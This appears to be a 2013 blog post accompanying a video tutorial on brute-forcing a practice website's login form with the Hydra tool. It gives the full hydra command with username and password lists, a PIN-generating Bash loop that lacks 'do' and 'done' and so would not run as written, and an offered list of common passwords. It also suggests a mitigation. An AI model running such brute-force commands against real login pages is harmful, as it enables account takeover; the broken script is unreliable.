Tuesday, September 24, 2013

Brute forcing a website login form using Hydra | Video

I have a new video that can get you past much more complex login forms and is easier to use, https://www.youtube.com/watch?v=OXIjNfX7BW8

In this video I show how to bruteforce a website's login form using the automated program Hydra. The login form that is being attacked is attack.samsclass.info/brute.htm chalenge #4.

 I also propose a possible mitigation by having your login success page display a hidden div at the top of the page containing the text from the failed login page. The user wouldn't see this, and hopefully when Hydra is searching for the text to know if the login was successful, it will come across this first and think it was another failed login.

Here is the actual command I used in the video, note that the uName.txt and uPass.txt point to the files on my desktop:

hydra -L uName.txt -P uPass.txt attack.samsclass.info http-get-form "/brute4.php:login=^USER^&pin=^PASS^:Denied"

Here is a quick Bash script to generate the 3 digit password:
for i in 0 1 2 3 4 5 6 7 8 9
  for j in 0 1 2 3 4 5 6 7 8 9 
     for k in 0 1 2 3 4 5 6 7 8 9   
       echo $i$j$k
You can download the script here but you will most likely need to run `chmod +x NumberGen.sh` on the file so that it can be executed by typing './NumberGen.sh' if you want the output of this file to create a text file we use what is called a pipe `>` so the terminal syntax would be `./NumberGen.sh > newFileName.txt` Or you can just download the text file that has all 1000 numbers here.

Due to all the requests I get for a password list, I have included the 10,000 most common passwords people use. I just found the list online and I believe it is in order from most common to least.

If you like my videos, please subscribe to me on YouTube:

Follow me on Twitter, @gFogerlie and Google+ https://plus.google.com/+GarrettFogerlie

If you have a video request you can let me know in the comments here or on my channel: